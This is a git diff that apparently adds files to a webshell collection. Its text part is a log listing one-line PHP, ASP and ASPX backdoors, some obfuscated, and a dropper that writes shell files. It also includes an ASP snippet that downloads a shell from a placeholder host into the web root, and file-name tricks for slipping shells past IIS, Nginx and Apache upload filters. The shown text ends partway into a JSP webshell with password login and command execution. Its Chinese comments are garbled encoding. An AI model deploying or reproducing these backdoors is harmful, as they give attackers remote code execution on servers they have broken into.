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
a&)eN1TReS>r8aMdKJmAarq+W`-~R`N%=F*@

literal 0
HcmV?d00001

diff --git a/caidao-shell/php.jpg b/caidao-shell/php.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..3d4e08940b3b864fb3e574a6ac1a509bb0cbdea2
GIT binary patch
literal 8039
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
WQH0ytT)FC|?C0gJ?0(z;X7nE~vZ(I>

literal 0
HcmV?d00001

diff --git a/caidao-shell/说明.log b/caidao-shell/说明.log
new file mode 100644
index 0000000..3dd7efb
--- /dev/null
+++ b/caidao-shell/说明.log
@@ -0,0 +1,86 @@
+   GIF89a   ͼƬͷ
+
+[+]---------------------------------PHP---------------------------------[+]
+<?php @eval($_POST['ice']);?>
+
+<?php header('status:404');${${eval($_POST[ice])}};?>
+
+<?php ($www= $_POST['ice']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>
+
+<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>
+
+
+<?fputs(fopen("ice.php","w"),"<?eval(\$_POST[ice]);?>")?>  
+
+<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
+// ͬĿ¼���� ice.php
+
+[+]---------------------------------PHP---------------------------------[+]
+
+
+
+***************************************************************************
+
+
+
+[+]---------------------------------ASP---------------------------------[+]
+<%eval request("ice")%>
+
+<%www=REquEst("ice"):EvaL(www)%>
+
+<%
+Dim ConKey:ConKey="ice"
+Dim InValue:InValue=Request(ConKey)
+eval(InValue)
+%>
+
+<%E=request("ice") execute E%>
+
+<%
+Set xPost = createObject("Microsoft.XMLHTTP")
+ xPost.Open "GET","http://www.xxx.com/shell.txt",0 'aspľ���ı���ʽ��ַ
+ xPost.Send()
+ Set sGet = createObject("ADODB.Stream")
+ sGet.Mode = 3
+ sGet.Type = 1
+ sGet.Open()
+ sGet.Write(xPost.responseBody)
+ sGet.SaveToFile "E:\WWWROOT\xxx.asp",2 
+ %>
+
+
+ ���}���������������šԩ͐�    // ANSI��>Unicode ������: a
+ ���}������������������ݩ͐�  //���� ice
+
+
+
+�ϴ�һ��ͼƬһ�仰(xxx.jpg)�����ϴ�һ��.asp�ļ�ȥ����:  <!--#include file="xxx.jpg" --> 
+
+
+[+]---------------------------------ASP---------------------------------[+]
+
+
+
+***************************************************************************
+
+
+
+[+]---------------------------------ASPX---------------------------------[+]
+
+<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%>
+
+<%@ Page Language="C#" ValidateRequest="false" %>
+<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%>
+
+[+]---------------------------------ASPX---------------------------------[+]
+  
+ IIS 6.0 ����:  x.asp/x.jpg  x.asp;x.jpg �����������ȫ�������λᱻ���أ����Գ��Խ�һ�仰���ļ�����Ϊ  ;x.asp;x.jpg (IIS 7.5 �������� a.aspx.a;.a.aspx.jpg..jpg ������)
+ Nginx ����:    x.jpg/.php   x.jpg%00.php  
+ Apache : x.php.x
+ xx.jpg.jsp,xx.png.jsp
+
+
+ ����Ϊ php��asp��aspxһ�仰ľ���Ŀͻ��ˣ������Ϊ ice ������һ�仰�ļ���д������Щ�����ӹ��������
+
+                                                     -- ����̿� --   
+                                                      2012-07-21
\ No newline at end of file
diff --git a/jsp/icesword.jsp b/jsp/icesword.jsp
new file mode 100644
index 0000000..d724da2
--- /dev/null
+++ b/jsp/icesword.jsp
@@ -0,0 +1,1808 @@
+<%@ page contentType="text/html; charset=GBK" %>
+<%@ page import="java.io.*"%>
+<%@ page import="java.util.Map"%>
+<%@ page import="java.util.HashMap"%>
+<%@ page import="java.nio.charset.Charset"%>
+<%@ page import="java.util.regex.*"%>
+<%@ page import="java.sql.*"%>
+<%!
+private String _password = "icesword";
+private String _encodeType = "GB2312";
+private int _sessionOutTime = 20;
+private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"};
+private Connection _dbConnection = null;
+private Statement _dbStatement = null;
+private String _url = null;
+
+public boolean validate(String password) {
+ if (password.equals(_password)) {
+  return true;
+ } else {
+  return false;
+ }
+}
+
+public String HTMLEncode(String str) {
+ str = str.replaceAll(" ", "&nbsp;");
+ str = str.replaceAll("<", "&lt;");
+ str = str.replaceAll(">", "&gt;");
+ str = str.replaceAll("\r\n", "<br>");
+ 
+ return str;
+}
+
+public String Unicode2GB(String str) {
+ String sRet = null;
+ 
+ try {
+  sRet = new String(str.getBytes("ISO8859_1"), _encodeType);
+ } catch (Exception e) {
+  sRet = str;
+ }
+ 
+ return sRet;
+}
+
+public String exeCmd(String cmd) {
+ Runtime runtime = Runtime.getRuntime();
+ Process proc = null;
+ String retStr = "";
+ InputStreamReader insReader = null;
